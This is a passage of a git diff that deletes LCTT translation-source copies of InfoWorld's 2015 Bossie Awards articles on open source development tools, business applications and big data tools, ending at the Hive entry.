-So far, the only tools for Rust are the Cargo package manager and the rustdoc documentation generator, plus a couple of simple Rust plug-ins for programming editors. As far as we have heard, there is no shipping software that was actually built with Rust. Now that Rust has reached the 1.0 milestone, we might expect that to change.
-
-Rust is distributed with a dual Apache 2.0 and MIT license. With 13,000 stars on its GitHub repository, Rust is certainly attracting attention, but when and how it will deliver real benefits remains to be seen.
-
--- Martin Heller
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-opencv-100613779-orig.jpg)
-
-### OpenCV ###
-
-[OpenCV][39] (Open Source Computer Vision Library) is a computer vision and machine learning library that contains about 500 algorithms, such as face detection, moving object tracking, image stitching, red-eye removal, machine learning, and eye movement tracking. It runs on Windows, Mac OS X, Linux, Android, and iOS.
-
-OpenCV has official C++, C, Python, Java, and MATLAB interfaces, and wrappers in other languages such as C#, Perl, and Ruby. CUDA and OpenCL interfaces are under active development. OpenCV was originally (1999) an Intel Research project in Russia; from there it moved to the robotics research lab Willow Garage (2008) and finally to [OpenCV.org][39] (2012) with a core team at Itseez, current source on GitHub, and stable snapshots on SourceForge.
-
-Users of OpenCV include Google, Yahoo, Microsoft, Intel, IBM, Sony, Honda, and Toyota. There are currently more than 6,000 stars and 5,000 forks on the GitHub repository. The project uses a BSD license.
-
--- Martin Heller
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-llvm-100613777-orig.jpg)
-
-### LLVM ###
-
-The [LLVM Project][40] is a collection of modular and reusable compiler and tool chain technologies, which originated at the University of Illinois. LLVM has grown to include a number of subprojects, several of which are interesting in their own right. LLVM is distributed with Debian, Ubuntu, and Apple Xcode, among others, and it’s used in commercial products from the likes of Adobe (including After Effects), Apple (including Objective-C and Swift), Cray, Intel, NVIDIA, and Siemens. A few of the open source projects that depend on LLVM are PyPy, Mono, Rubinius, Pure, Emscripten, Rust, and Julia. Microsoft has recently contributed LLILC, a new LLVM-based compiler for .Net, to the .Net Foundation.
-
-The main LLVM subprojects are the core libraries, which provide optimization and code generation; Clang, a C/C++/Objective-C compiler that’s about three times faster than GCC; LLDB, a much faster debugger than GDB; libc++, an implementation of the C++11 Standard Library; and OpenMP, for parallel programming.
-
--- Martin Heller
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-main-100613823-orig.jpg)
-
-### Read about more open source winners ###
-
-InfoWorld's Best of Open Source Awards for 2015 celebrate more than 100 open source projects, from the bottom of the stack to the top. Follow these links to more open source winners:
-
-[Bossie Awards 2015: The best open source applications][41]
-
-[Bossie Awards 2015: The best open source application development tools][42]
-
-[Bossie Awards 2015: The best open source big data tools][43]
-
-[Bossie Awards 2015: The best open source data center and cloud software][44]
-
-[Bossie Awards 2015: The best open source desktop and mobile software][45]
-
-[Bossie Awards 2015: The best open source networking and security software][46]
-
---------------------------------------------------------------------------------
-
-via: http://www.infoworld.com/article/2982920/open-source-tools/bossie-awards-2015-the-best-open-source-application-development-tools.html
-
-作者:[InfoWorld staff][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://www.infoworld.com/author/InfoWorld-staff/
-[1]:https://www.docker.com/
-[2]:https://nodejs.org/en/
-[3]:https://iojs.org/en/
-[4]:https://developers.google.com/v8/?hl=en
-[5]:http://www.ancestry.com/
-[6]:http://www.ge.com/
-[7]:https://www.pearson.com/
-[8]:https://angularjs.org/
-[9]:https://builtwith.angularjs.org/
-[10]:https://facebook.github.io/react/
-[11]:https://facebook.github.io/react-native/
-[12]:http://reactjs.net/
-[13]:http://asp.net/
-[14]:https://atom.io/
-[15]:http://brackets.io/
-[16]:http://www.typescriptlang.org/
-[17]:http://definitelytyped.org/
-[18]:http://definitelytyped.org/tsd/
-[19]:http://swagger.io/
-[20]:https://github.com/swagger-api/swagger-ui
-[21]:https://github.com/swagger-api/swagger-codegen
-[22]:https://github.com/swagger-api/swagger-editor
-[23]:https://github.com/swagger-api/swagger-js
-[24]:http://aws.amazon.com/cn/api-gateway/
-[25]:https://github.com/awslabs/aws-apigateway-importer
-[26]:https://www.polymer-project.org/
-[27]:http://ionicframework.com/
-[28]:https://cordova.apache.org/
-[29]:http://famous.org/
-[30]:http://famous.org/framework/
-[31]:https://www.mongodb.org/
-[32]:http://www.infoworld.com/article/2878738/nosql/first-look-mongodb-30-for-mature-audiences.html
-[33]:http://www.infoworld.com/article/2929772/nosql/mongodb-crossroads-growth-or-openness.html
-[34]:http://www.couchbase.com/nosql-databases/couchbase-server
-[35]:https://cassandra.apache.org/
-[36]:http://orientdb.com/
-[37]:http://rethinkdb.com/
-[38]:https://www.rust-lang.org/
-[39]:http://opencv.org/
-[40]:http://llvm.org/
-[41]:http://www.infoworld.com/article/2982622/bossie-awards-2015-the-best-open-source-applications.html
-[42]:http://www.infoworld.com/article/2982920/bossie-awards-2015-the-best-open-source-application-development-tools.html
-[43]:http://www.infoworld.com/article/2982429/bossie-awards-2015-the-best-open-source-big-data-tools.html
-[44]:http://www.infoworld.com/article/2982923/bossie-awards-2015-the-best-open-source-data-center-and-cloud-software.html
-[45]:http://www.infoworld.com/article/2982630/bossie-awards-2015-the-best-open-source-desktop-and-mobile-software.html
-[46]:http://www.infoworld.com/article/2982962/bossie-awards-2015-the-best-open-source-networking-and-security-software.html
diff --git a/sources/share/20151028 Bossie Awards 2015--The best open source applications.md b/sources/share/20151028 Bossie Awards 2015--The best open source applications.md
deleted file mode 100644
index 29fced5cc9..0000000000
--- a/sources/share/20151028 Bossie Awards 2015--The best open source applications.md
+++ /dev/null
@@ -1,238 +0,0 @@
-Bossie Awards 2015: The best open source applications
-================================================================================
-InfoWorld's top picks in open source business applications, enterprise integration, and middleware
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-applications-100614669-orig.jpg)
-
-### The best open source applications ###
-
-Applications -- ERP, CRM, HRM, CMS, BPM -- are not only fertile ground for three-letter acronyms, they're the engines behind every modern business. Our top picks in the category include back- and front-office solutions, marketing automation, lightweight middleware, heavyweight middleware, and other tools for moving data around, mixing it together, and magically transforming it into smarter business decisions.
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-xtuple-100614684-orig.jpg)
-
-### xTuple ###
-
-Small and midsize companies with light manufacturing or distribution needs have a friend in [xTuple][1]. This modular ERP/CRM combo bundles operations and financial control, product and inventory management, and CRM and sales support. Its relatively simple install lets you deploy all of the modules or only what you need today -- helping trim support costs without sacrificing customization later.
-
-This summer’s release brought usability improvements to the UI and a generous number of bug fixes. Recent updates also yielded barcode scanning and label printing for mobile warehouse workers, an enhanced workflow module (built with Plv8, a wrapper around Google’s V8 JavaScript engine that lets you write stored procedures for PostgreSQL in JavaScript), and quality management tools that are sure to get mileage on shop floors.
-
-The xTuple codebase is JavaScript from stem to stern. The server components can all be installed locally, in xTuple’s cloud, or deployed as an appliance. A mobile Web client and mobile CRM features augment a good native desktop client.
-
--- James R. Borck
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-odoo-100614678-orig.jpg)
-
-### Odoo ###
-
-[Odoo][2] used to be known as OpenERP. Last year the company raised private capital and broadened its scope. Today Odoo is a one-stop shop for back office and customer-facing applications -- replete with content management, business intelligence, and e-commerce modules.
-
-Odoo 8 fronts accounting, invoicing, project management, resource planning, and customer relationship management tools with a flexible Web interface that can be tailored to your company’s workflow. Add-on modules for warehouse management and HR, as well as for live chat and analytics, round out the solution.
-
-This year saw Odoo focused primarily on usability updates. A recently released sales planner helps sales groups track KPIs, and a new tips feature lends in-context help. Odoo 9 is right around the corner with alpha builds showing customer portals, Web form creation tools, mobile and VoIP services, and integration hooks to eBay and Amazon.
-
-Available for Windows and Linux, and as a SaaS offering, Odoo gives small and midsized companies an accessible set of tools to manage virtually every aspect of their business.
-
--- James R. Borck
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-idempiere-100614673-orig.jpg)
-
-### iDempiere ###
-
-Small and midsize companies have great choices in Odoo and xTuple. Larger manufacturing and distribution companies will need something more. For them, there’s [iDempiere][3] -- a well maintained offshoot of ADempiere with OSGi modularity.
-
-iDempiere implements a fully loaded ERP, supply chain, and CRM suite right out of the box. Built with Java, iDempiere supports both PostgreSQL and Oracle Database, and it can be customized extensively through modules built to the OSGi specification. iDempiere is perfectly suited to managing complex business scenarios involving multiple partners, requiring dynamic reporting, or employing point-of-sale and warehouse services.
-
-Being enterprise-ready comes with a price. iDempiere’s feature-rich tools and complexity impose a steep learning curve and require a commitment to integration support. Of course, those costs are offset by savings from the software’s free GPL2 licensing. iDempiere’s easy install script, small resource footprint, and clean interface also help alleviate some of the startup pains. There’s even a virtual appliance available on Sourceforge to get you started.
-
--- James R. Borck
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-suitecrm-100614680-orig.jpg)
-
-### SuiteCRM ###
-
-SugarCRM had held the sweet spot in open source CRM since, well, forever. Then last year Sugar announced it would no longer contribute to the open source Community Edition. Into the ensuing vacuum rushed [SuiteCRM][4] – a fork of the final Sugar code.
-
-SuiteCRM 7.2 creates an experience on a par with SugarCRM Professional’s marketing, sales, and service tools. With add-on modules for workflow, reporting, and security, as well as new innovations like Lucene-driven search, taps for social media, and a beta reveal of new desktop notifications, SuiteCRM is on solid footing.
-
-The Advanced Open Sales module provides a familiar migration path from Sugar, while commercial support is available from the likes of [SalesAgility][5], the company that forked SuiteCRM in the first place. In little more than a year, SuiteCRM rescued the code, rallied an inspired community, and emerged as a new leader in open source CRM. Who needs Sugar?
-
--- James R. Borck
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-civicrm-100614671-orig.jpg)
-
-### CiviCRM ###
-
-We typically focus attention on CRM vis-à-vis small and midsize business requirements. But nonprofit and advocacy groups need to engage with their “customers” too. Enter [CiviCRM][6].
-
-CiviCRM addresses the needs of nonprofits with tools for fundraising and donation processing, membership management, email tracking, and event planning. Granular access control and security bring role-based permissions to views, keeping paid staff and volunteers partitioned and productive. This year CiviCRM continued to develop with new features like simple A/B testing and monitoring for email campaigns.
-
-CiviCRM deploys as a plug-in to your WordPress, Drupal, or Joomla content management system -- a dead-simple install if you already have one of these systems in place. If you don’t, CiviCRM is an excellent reason to deploy the CMS. It’s a niche-filling solution that allows nonprofits to start using smarter, tailored tools for managing constituencies, without steep hurdles and training costs.
-
--- James R. Borck
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-mautic-100614677-orig.jpg)
-
-### Mautic ###
-
-For marketers, the Internet -- Web, email, social, all of it -- is the stuff dreams are made on. [Mautic][7] allows you to create Web and email campaigns that track and nurture customer engagement, then roll all of the data into detailed reports to gain insight into customer needs and wants and how to meet them.
-
-Open source options in marketing automation are few, but Mautic’s extensibility stands out even against closed solutions like IBM’s Silverpop. Mautic even integrates with popular third-party email marketing solutions (MailChimp, Constant Contact) and social media platforms (Facebook, Twitter, Google+, Instagram) with quick-connect widgets.
-
-The developers of Mautic could stand to broaden the features for list segmentation and improve the navigability of their UI. Usability is also hindered by sparse documentation. But if you’re willing to rough it out long enough to learn your way, you’ll find a gem -- and possibly even gold -- in Mautic.
-
--- James R. Borck
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-orangehrm-100614679-orig.jpg)
-
-### OrangeHRM ###
-
-The commercial software market in the human resource management space is rather fragmented, with Talent, HR, and Workforce Management startups all vying for a slice of the pie. It’s little wonder the open source world hasn’t found much direction either, with the most ambitious HRM solutions often locked inside larger ERP distributions. [OrangeHRM][8] is a standout.
-
-OrangeHRM tackles employee administration from recruitment and applicant tracking to performance reviews, with good audit trails throughout. An employee portal provides self-serve access to personal employment information, time cards, leave requests, and personnel documents, helping reduce demands on HR staff.
-
-OrangeHRM doesn’t yet address niche aspects like talent management (social media, collaboration, knowledge banks), but it’s remarkably full-featured. Professional and Enterprise options offer more advanced functionality (in areas such as recruitment, training, on/off-boarding, document management, and mobile device access), while community modules are available for the likes of Active Directory/LDAP integration, advanced reporting, and even insurance benefit management.
-
--- James R. Borck
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-libreoffice-100614675-orig.jpg)
-
-### LibreOffice ###
-
-[LibreOffice][9] is the easy choice for best open source office productivity suite. Originally forked from OpenOffice, Libre has been moving at a faster clip than OpenOffice ever since, drawing more developers and producing more new features than its rival.
-
-LibreOffice 5.0, released only last month, offers UX improvements that truly enhance usability (like visual previews of style changes in the sidebar), brings document editing to Android devices (previously a view-only prospect), and finally delivers on a 64-bit Windows codebase.
-
-LibreOffice still lacks a built-in email client and a personal information manager, not to mention the real-time collaborative document editing available in Microsoft Office. But Libre can run off of a USB flash disk for portability, natively supports a greater number of graphic and file formats, and creates hybrid PDFs with embedded ODF files for full-on editing. Libre even imports Apple Pages documents, in addition to opening and saving all Microsoft Office formats.
-
-LibreOffice has done a solid job of tightening its codebase and delivering enhancements at a regular clip. With a new cloud version under development, LibreOffice will soon be more liberating than ever.
-
--- James R. Borck
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-bonita-100614672-orig.jpg)
-
-### Bonita BPM ###
-
-Open source BPM has become a mature, cost-effective alternative to the top proprietary solutions. Having led the charge since 2009, Bonitasoft continues to raise the bar. The new [Bonita BPM 7][10] release impresses with innovative features that simplify code generation and shorten development cycles for BPM app creation.
-
-Most important to the new version, though, is better abstraction of underlying core business logic from UI and data components, allowing UIs and processes to be developed independently. This new MVC approach reduces downtime for live upgrades (no more recompilation!) and eases application maintenance.
-
-Bonita contains a winning set of connectors to a broad range of enterprise systems (ERP, CRM, databases) as well as to Web services. Complementing its process weaving tools, a new form designer (built on AngularJS/Bootstrap) goes a long way toward improving UI creation for the Web-centric and mobile workforce.
-
--- James R. Borck
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-camunda-100614670-orig.jpg)
-
-### Camunda BPM ###
-
-Many open source solutions, like Bonita BPM, offer solid, drop-in functionality. Dig into the code base, though, and you may find it’s not the cleanest to build upon. Enterprise Java developers who hang out under the hood should check out [Camunda BPM][11].
-
-Forked from Alfresco Activiti (a creation of former Red Hat jBPM developers), Camunda BPM delivers a tight, Java-based BPMN 2.0 engine in support of human workflow activities, case management, and systems process automation that can be embedded in your Java apps or run as a container service in Tomcat. Camunda’s ecosystem offers an Eclipse plug-in for process modeling, and the Cockpit dashboard brings real-time monitoring and management of running processes.
-
-The Enterprise version adds WebSphere and WebLogic Server support. Additional incentives for the Enterprise upgrade include Saxon-driven XSLT templating (sidestepping the scripting engine) and add-ons to improve process management and exception handling.
-
-Camunda is a solid BPM engine ready for build-out and one of the first open source process managers to introduce DMN (Decision Model and Notation) support, which helps to simplify complex rules-based modeling alongside BPMN. DMN support is currently at the alpha stage.
-
--- James R. Borck
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-talend-100614681-orig.jpg)
-
-### Talend Open Studio ###
-
-No open source ETL or EAI solution comes close to [Talend Open Studio][12] in functionality, performance, or support of modern integration trends. This year Talend unleashed Open Studio 6, a new version with a streamlined UI and smarter tooling that brings it more in line with Talend’s cloud-based offering.
-
-Using Open Studio you can visually design, test, and debug orchestrations that connect, transform, and synchronize data across a broad range of real-time applications and data resources. Talend’s wealth of connectors provides support for most any endpoint -- from flat files to Hadoop to Amazon S3. Packaged editions focus on specific scenarios such as big data integration, ESB, and data integrity monitoring.
-
-New support for Java 8 brings a speed boost. The addition of support for MariaDB and for in-memory processing with MemSQL, as well as updates to the ESB engine, keep Talend in step with the community’s needs. Version 6 was a long time coming, but no less welcome for that. Talend Open Studio is still first in managing complex data integration -- in-house, in the cloud, or increasingly, a combination of the two.
-
--- James R. Borck
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-warewolf-100614683-orig.jpg)
-
-### Warewolf ESB ###
-
-Complex integration patterns may demand the strengths of a Talend to get the job done. But for many lightweight microservices, the overhead of a full-fledged enterprise integration solution is extreme overkill.
-
-[Warewolf ESB][13] combines a streamlined .Net-based process engine with visual development tools to provide for dead simple messaging and application payload routing in a native Windows environment. The Warewolf ESB is an “easy service bus,” not an enterprise service bus.
-
-Drag-and-drop tooling in the design studio makes quick work of configuring connections and logic flows. Built-in wizardry handles Web services definitions and database calls, and it can even tap Windows DLLs and the command line directly. Using the visual debugger, you can inspect execution streams (if not yet actually step through them), then package everything for remote deployment.
-
-Warewolf is still a 0.40.5 release and undergoing major code changes. It also lacks native connectors, easy transforms, and any means of scalability management. Be aware that the precompiled install demands collection of some usage statistics (I wish they would stop that). But Warewolf ESB is fast, free, and extensible. It’s a quirky, upstart project that offers definite benefits to Windows integration architects.
-
--- James R. Borck
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-knime-100614674-orig.jpg)
-
-### KNIME ###
-
-[KNIME][14] takes a code-free approach to predictive analytics. Using a graphical workbench, you wire together workflows from an abundant library of processing nodes, which handle data access, transformation, analysis, and visualization. With KNIME, you can pull data from databases and big data platforms, run ETL transformations, perform data mining with R, and produce custom reports in the end.
-
-The company was busy this year rolling out the KNIME 2.12 update. The new release introduces MongoDB support, XPath nodes with autoquery creation, and a new view controller (based on the D3 JavaScript library) that creates interactive data visualizations on the fly. It also includes additional statistical nodes and a REST interface (KNIME Server edition) that provides services-based access to workflows.
-
-KNIME’s core analytics engine is free open source. The company offers several fee-based extensions for clustering and collaboration. (A portion of your licensing fee actually funds the open source project.) KNIME Server (on-premise or cloud) ups the ante with security, collaboration, and workflow repositories -- all serving to inject analytics more productively throughout your business lines.
-
--- James R. Borck
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-teiid-100614682-orig.jpg)
-
-### Teiid ###
-
-[Teiid][15] is a data virtualization system that allows applications to use data from multiple, heterogeneous data stores. Currently a JBoss project, Teiid is backed by years of development from MetaMatrix and a long history of addressing the data access needs of the largest enterprise environments. I even see [uses for Teiid in Hadoop and big data environments][16].
-
-In essence, Teiid allows you to connect all of your data sources into a “virtual” mega data source. You can define caching semantics, transforms, and other “configuration not code” options to load from multiple data sources using plain old SQL, XQuery, or procedural queries.
-
-Teiid is primarily accessible through JDBC and has built-in support for Web services. Red Hat sells Teiid as [JBoss Data Virtualization][17].
-
--- Andrew C. Oliver
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-main-100614676-orig.jpg)
-
-### Read about more open source winners ###
-
-InfoWorld's Best of Open Source Awards for 2015 celebrate more than 100 open source projects, from the bottom of the stack to the top. Follow these links to more open source winners:
-
-[Bossie Awards 2015: The best open source applications][18]
-
-[Bossie Awards 2015: The best open source application development tools][19]
-
-[Bossie Awards 2015: The best open source big data tools][20]
-
-[Bossie Awards 2015: The best open source data center and cloud software][21]
-
-[Bossie Awards 2015: The best open source desktop and mobile software][22]
-
-[Bossie Awards 2015: The best open source networking and security software][23]
-
---------------------------------------------------------------------------------
-
-via: http://www.infoworld.com/article/2982622/open-source-tools/bossie-awards-2015-the-best-open-source-applications.html
-
-作者:[InfoWorld staff][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://www.infoworld.com/author/InfoWorld-staff/
-[1]:http://xtuple.org/
-[2]:http://odoo.com/
-[3]:http://idempiere.org/
-[4]:http://suitecrm.com/
-[5]:http://salesagility.com/
-[6]:http://civicrm.org/
-[7]:https://www.mautic.org/
-[8]:http://www.orangehrm.com/
-[9]:http://libreoffice.org/
-[10]:http://www.bonitasoft.com/
-[11]:http://camunda.com/
-[12]:http://talend.com/
-[13]:http://warewolf.io/
-[14]:http://www.knime.org/
-[15]:http://teiid.jboss.org/
-[16]:http://www.infoworld.com/article/2922180/application-development/database-virtualization-or-i-dont-want-to-do-etl-anymore.html
-[17]:http://www.jboss.org/products/datavirt/overview/
-[18]:http://www.infoworld.com/article/2982622/bossie-awards-2015-the-best-open-source-applications.html
-[19]:http://www.infoworld.com/article/2982920/bossie-awards-2015-the-best-open-source-application-development-tools.html
-[20]:http://www.infoworld.com/article/2982429/bossie-awards-2015-the-best-open-source-big-data-tools.html
-[21]:http://www.infoworld.com/article/2982923/bossie-awards-2015-the-best-open-source-data-center-and-cloud-software.html
-[22]:http://www.infoworld.com/article/2982630/bossie-awards-2015-the-best-open-source-desktop-and-mobile-software.html
-[23]:http://www.infoworld.com/article/2982962/bossie-awards-2015-the-best-open-source-networking-and-security-software.html
\ No newline at end of file
diff --git a/sources/share/20151028 Bossie Awards 2015--The best open source big data tools.md b/sources/share/20151028 Bossie Awards 2015--The best open source big data tools.md
deleted file mode 100644
index 0cf65ea3a8..0000000000
--- a/sources/share/20151028 Bossie Awards 2015--The best open source big data tools.md
+++ /dev/null
@@ -1,287 +0,0 @@
-Bossie Awards 2015: The best open source big data tools
-================================================================================
-InfoWorld's top picks in distributed data processing, streaming analytics, machine learning, and other corners of large-scale data analytics
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-big-data-100613944-orig.jpg)
-
-### The best open source big data tools ###
-
-How many Apache projects can sit on a pile of big data? Fire up your Hadoop cluster, and you might be able to count them. Among this year's Bossies in big data, you'll find the fastest, widest, and deepest newfangled solutions for large-scale SQL, stream processing, sort-of stream processing, and in-memory analytics, not to mention our favorite maturing members of the Hadoop ecosystem. It seems everyone has a nail to drive into MapReduce's coffin.
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-spark-100613962-orig.jpg)
-
-### Spark ###
-
-With hundreds of contributors, [Spark][1] is one of the most active and fastest-growing Apache projects, and with heavyweights like IBM throwing their weight behind the project and major corporations bringing applications into large-scale production, the momentum shows no signs of letting up.
-
-The sweet spot for Spark continues to be machine learning. Highlights since last year include the replacement of the SchemaRDD with a Dataframes API, similar to those found in R and Pandas, making data access much simpler than with the raw RDD interface. Also new are ML pipelines for building repeatable machine learning workflows, expanded and optimized support for various storage formats, simpler interfaces to machine learning algorithms, improvements in the display of cluster resource usage, and task tracking.
-
-On by default in Spark 1.5 is the off-heap memory manager, Tungsten, which offers much faster processing by fine-tuning data structure layout in memory. Finally, the new website, [spark-packages.org][2], with more than 100 third-party libraries, adds many useful features from the community.
-
--- Steven Nunez
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-storm-100614149-orig.jpg)
-
-### Storm ###
-
-[Apache Storm][3] is a Clojure-based distributed computation framework primarily for streaming real-time analytics. Storm is based on the [disruptor pattern][4] for low-latency complex event processing created by LMAX. Unlike Spark, Storm can process single events as opposed to “micro-batches,” and it has a lower memory footprint. In my experience, it scales better for streaming, especially when you’re mainly streaming to ingest data into other data sources.
-
-Storm’s profile has been eclipsed by Spark, but Spark is inappropriate for many streaming applications. Storm is frequently used with Apache Kafka.
-
--- Andrew C. Oliver
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-h2o-100613950-orig.jpg)
-
-### H2O ###
-
-[H2O][5] is a distributed, in-memory processing engine for machine learning that boasts an impressive array of algorithms. Previously only available for R users, version 3.0 adds Python and Java language bindings, as well as a Spark execution engine for the back end. The best way to view H2O is as a very large memory extension of your R environment. Instead of working directly on large data sets, the R extensions communicate via a REST API with the H2O cluster, where H2O does the heavy lifting.
-
-Several useful R packages such as ddply have been wrapped, allowing you to use them on data sets larger than the amount of RAM on the local machine. You can run H2O on EC2, on a Hadoop/YARN cluster, and on Docker containers. With Sparkling Water (Spark plus H2O), you can access Spark RDDs on the cluster from H2O, allowing you, for example, to process a data frame with Spark before passing it to an H2O machine learning algorithm.
-
--- Steven Nunez
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-apex-100613943-orig.jpg)
-
-### Apex ###
-
-[Apex][6] is an enterprise-grade, big data-in-motion platform that unifies stream processing as well as batch processing. A native YARN application, Apex processes streaming data in a scalable, fault-tolerant manner and provides all the common stream operators out of the box. One of the best things about Apex is that it natively supports the common event processing guarantees (exactly once, at least once, at most once). Formerly a commercial product by DataTorrent, Apex's roots show in the quality of the documentation, examples, code, and design. Devops and application development are cleanly separated, and user code generally doesn't have to be aware that it is running in a streaming cluster.
-
-A related project, [Malhar][7], offers more than 300 commonly used operators and application templates that implement common business logic. The Malhar libraries significantly reduce the time it takes to develop an Apex application, and there are connectors (operators) for storage, file systems, messaging systems, databases, and nearly anything else you might want to connect to from an application. The operators can all be extended or customized to meet an individual business's requirements. All Malhar components are available under the Apache license.
-
--- Steven Nunez
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-druid-100613947-orig.jpg)
-
-### Druid ###
-
-[Druid][8], which moved to a commercially friendly Apache license in February of this year, is best described as a hybrid, “event streams meet OLAP” solution. Originally developed to analyze online events for ad markets, Druid allows users to do arbitrary and interactive exploration of time series data. Some of the key features include low-latency ingest of events, fast aggregations, and approximate and exact calculations.
-
-At the heart of Druid is a custom data store that uses specialized nodes to handle each part of the problem. Real-time ingest is managed by real-time nodes (JVMs) that eventually flush data to historical nodes that are responsible for data that has aged. Broker nodes direct queries in a scatter-gather fashion to both real-time and historical nodes to give the user a complete picture of events. Benchmarked at a sustained 500K events per second and 1 million events per second peak, Druid is ideal as a real-time dashboard for ad-tech, network traffic, and other activity streams.
-
--- Steven Nunez
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-flink-100613949-orig.jpg)
-
-### Flink ###
-
-At its core, [Flink][9] is a data flow engine for event streams. Although superficially similar to Spark, Flink takes a different approach to in-memory processing. First, Flink was designed from the start as a stream processor. Batch is simply a special case of a stream with a beginning and an end, and Flink offers APIs for dealing with each case, the DataSet API (batch) and the DataStream API. Developers coming from the MapReduce world should feel right at home working with the DataSet API, and porting applications to Flink should be straightforward. In many ways Flink mirrors the simplicity and consistency that helped make Spark so popular. Like Spark, Flink is written in Scala.
-
-The developers of Flink clearly thought out usage and operations too: Flink works natively with YARN and Tez, and it uses an off-heap memory management scheme to work around some of the JVM limitations. A peek at the Flink JIRA site shows a healthy pace of development, and you’ll find an active community on the mailing lists and on StackOverflow as well.
-
--- Steven Nunez
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-elastic-100613948-orig.jpg)
-
-### Elasticsearch ###
-
-[Elasticsearch][10] is a distributed document search server based on [Apache Lucene][11]. At its heart, Elasticsearch builds indices on JSON-formatted documents in nearly real time, enabling fast, full-text, schema-free queries. Combined with the open source Kibana dashboard, you can create impressive visualizations of your real-time data in a simple point-and-click fashion.
-
-Elasticsearch is easy to set up and easy to scale, automatically making use of new hardware by rebalancing shards as required. The query syntax isn't at all SQL-like, but it is intuitive enough for anyone familiar with JSON. Most users won't be interacting at that level anyway. Developers can use the native JSON-over-HTTP interface or one of the several language bindings available, including Ruby, Python, PHP, Perl, .Net, Java, and JavaScript.
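-
-A sketch of that JSON-over-HTTP interface through the official elasticsearch client for Node.js (index and field names are illustrative):
-
-    import * as elasticsearch from 'elasticsearch';
-
-    const client = new elasticsearch.Client({ host: 'localhost:9200' });
-
-    // The query DSL is plain JSON; this full-text match needs no schema.
-    client.search({
-        index: 'articles',
-        body: { query: { match: { title: 'open source' } } },
-    }).then((resp: any) => {
-        for (const hit of resp.hits.hits) {
-            console.log(hit._score, hit._source);
-        }
-    });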
-
--- Steven Nunez
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-slamdata-100613961-orig.jpg)
-
-### SlamData ###
-
-If you are seeking a user-friendly tool to visualize and understand your newfangled NoSQL data, take a look at [SlamData][12]. SlamData allows you to query nested JSON data using familiar SQL syntax, without relocation or transformation.
-
-One of the technology’s main features is its connectors. From MongoDB to HBase, Cassandra, and Apache Spark, SlamData taps external data sources with the industry's most advanced “pushdown” processing technology, performing transformations and analytics close to the data.
-
-While you might ask, “Wouldn’t I be better off building a data lake or data warehouse?” consider the companies that were born in NoSQL. Skipping the ETL and simply connecting a visualization tool to a replica offers distinct advantages -- not only in terms of how up-to-date the data is, but in how many moving parts you have to maintain.
-
--- Andrew C. Oliver
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-drill-100613946-orig.jpg)
-
-### Drill ###
-
-[Drill][13] is a distributed system for interactive analysis of large-scale data sets, inspired by [Google's Dremel][14]. Designed for low-latency analysis of nested data, Drill has a stated design goal of scaling to 10,000 servers and querying petabytes of data and trillions of records.
-
-Nested data can be obtained from a variety of data sources (such as HDFS, HBase, Amazon S3, and Azure Blobs) and in multiple formats (including JSON, Avro, and protocol buffers), and you don't need to specify a schema up front (“schema on read”).
-
-Drill uses ANSI SQL:2003 for its query language, so there's no learning curve for data engineers to overcome, and it allows you to join data across multiple data sources (for example, joining a table in HBase with logs in HDFS). Finally, Drill offers ODBC and JDBC interfaces to connect your favorite BI tools.
-
--- Steven Nunez
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-hbase-100613951-orig.jpg)
-
-### HBase ###
-
-[HBase][15] reached the 1.x milestone this year and continues to improve. Like other nonrelational distributed datastores, HBase excels at returning search results very quickly and for this reason is often used to back search engines, such as the ones at eBay, Bloomberg, and Yahoo. As a stable and mature software offering, HBase does not get fresh features as frequently as newer projects, but that's often good for enterprises.
-
-Recent improvements include the addition of high-availability region servers, support for rolling upgrades, and YARN compatibility. Features in the works include scanner updates that promise to improve performance and the ability to use HBase as a persistent store for streaming applications like Storm and Spark. HBase can also be queried SQL style via the [Phoenix][16] project, now out of incubation, whose SQL compatibility is steadily improving. Phoenix recently added a Spark connector and the ability to add custom user-defined functions.
-
--- Steven Nunez
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-hive-100613952-orig.jpg)
-
-### Hive ###
-
